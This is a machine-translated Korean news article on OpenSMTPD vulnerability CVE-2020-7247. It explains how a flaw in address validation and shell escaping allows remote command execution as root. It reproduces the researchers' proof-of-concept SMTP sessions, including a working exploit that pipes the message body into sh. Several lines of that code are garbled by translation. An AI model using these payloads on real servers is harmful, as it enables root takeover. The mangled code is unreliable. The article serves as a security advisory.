🥇루트 권한으로 원격 코드 실행을 허용하는 OpenSMTPD의 취약점

OpenBSD 프로젝트에서 개발한 메일 서버에서 오픈SMTPD 확인됨 심각한 취약점 (CVE-2020-7247), 루트 사용자 권한으로 서버에서 원격으로 셸 명령을 실행할 수 있습니다. 해당 취약점은 Qualys Security가 실시한 재감사(이전 OpenSMTPD 감사)에서 확인되었습니다. 개최 2015년에 발견되었으며, 새로운 취약점은 2018년 XNUMX월부터 나타났습니다. 문제 제거 OpenSMTPD 6.6.2 릴리스에서. 모든 사용자는 업데이트를 즉시 설치하는 것이 좋습니다(OpenBSD의 경우 syspatch를 통해 패치를 설치할 수 있음).

두 가지 공격 옵션이 제안됩니다. 첫 번째 옵션은 기본 OpenSMTPD 구성(localhost의 요청만 수락)에서 작동하며 공격자가 서버(예: 호스팅 시스템)의 로컬 네트워크 인터페이스(루프백)에 액세스할 수 있는 경우 로컬에서 문제를 악용할 수 있습니다. . 두 번째 옵션은 OpenSMTPD가 외부 네트워크 요청(타사 메일을 허용하는 메일 서버)을 수신하도록 구성된 경우 발생합니다. 연구원들은 OpenBSD 6.6에 포함된 OpenSMTPD 버전과 다른 운영 체제용 이식 가능한 버전 모두에서 성공적으로 작동하는 익스플로잇의 프로토타입을 준비했습니다(Debian Testing에서 수행됨).

이 문제는 보낸 사람/받는 사람을 정의하고 연결 중에 전달되는 "MAIL FROM" 및 "RCPT TO" 필드 값의 정확성을 확인하기 위해 호출되는 smtp_mailaddr() 함수의 오류로 인해 발생합니다. 메일 서버와 함께. 이메일 주소 중 “@” 기호 앞에 오는 부분을 확인하려면 smtp_mailaddr() 함수를 호출합니다.
valid_localpart()는 RFC 5322에서 요구하는 대로 "!#$%&'*/?^`{|}~+-=_" 문자를 허용(MAILADDR_ALLOWED)합니다.

이 경우 문자열의 직접 이스케이프는 "!#$%&'*?`{|}~"(MAILADDR_ESCAPE) 문자만 바꾸는 mda_expand_token() 함수에서 수행됩니다. 이후 mda_expand_token()에서 준비된 라인은 'execle("/bin/sh", "/bin/sh", "-c", mda_command,...' 명령을 사용하여 전달 에이전트(MDA)를 호출할 때 사용됩니다. . /bin/sh를 통해 mbox에 문자를 배치하는 경우 "/usr/libexec/mail.local -f %%{mbox.from} %%{user.username}" 행이 실행되고, 여기서 "%" 값은 {mbox.from}”에는 "MAIL FROM" 매개변수에서 이스케이프된 데이터가 포함됩니다.

취약점의 본질은 smtp_mailaddr()에 논리적 오류가 있다는 것입니다. 이로 인해 빈 도메인이 이메일로 전송되면 "@" 앞의 주소 부분에 유효하지 않은 문자가 포함되어 있어도 함수가 성공적인 확인 코드를 반환합니다. . 또한 문자열을 준비할 때 mda_expand_token() 함수는 가능한 모든 쉘 특수 문자를 이스케이프하지 않고 이메일 주소에 허용되는 특수 문자만 이스케이프합니다. 따라서 명령을 실행하려면 이메일의 로컬 부분에 ";" 기호를 사용하는 것으로 충분합니다. MAILADDR_ESCAPE 세트에 포함되지 않고 이스케이프되지 않는 공백입니다. 예를 들어:

$ NC 127.0.0.1 25

HELO 교수.팔켄
메일 보낸 사람:<;sleep 66;>
RCPT 대상:
데이터
.
뒀어요

이 세션이 끝나면 OpenSMTPD가 mbox에 전달되면 셸을 통해 명령을 실행합니다.

/usr/libexec/mail.local -f ;sleep 66; 뿌리

동시에 주소의 로컬 부분이 64자를 초과할 수 없으며 특수 문자 '$' 및 '|'가 포함되어 공격 가능성이 제한됩니다. 이스케이프할 때는 ":"으로 대체됩니다. 이 제한을 우회하기 위해 우리는 입력 스트림을 통해 /usr/libexec/mail.local을 실행한 후 문자 본문이 전송된다는 사실을 사용합니다. 주소를 조작하면 sh 명령 해석기를 실행하고 문자 본문을 일련의 지침으로 사용할 수만 있습니다. 서비스 SMTP 헤더는 문자 시작 부분에 표시되므로 이를 건너뛰려면 루프에서 읽기 명령을 사용하는 것이 좋습니다. 작동하는 익스플로잇은 다음과 같습니다:

$ NC 192.168.56.143 25

HELO 교수.팔켄
메일 보낸 사람:<;for i in 0 1 2 3 4 5 6 7 8 9 abcd;읽기 r;완료;sh;exit 0;>
RCPT 대상:[이메일 보호]>
데이터
#0
#1
...
#d
WOPR에서는 나에 대해; 하다
echo -n "($i) " && id || 부서지다
완료 > /root/x."`id -u`.""$$"
.
뒀어요

출처 : opennet.ru

루트 권한으로 원격 코드 실행을 허용하는 OpenSMTPD의 취약점

코멘트를 추가 답장을 취소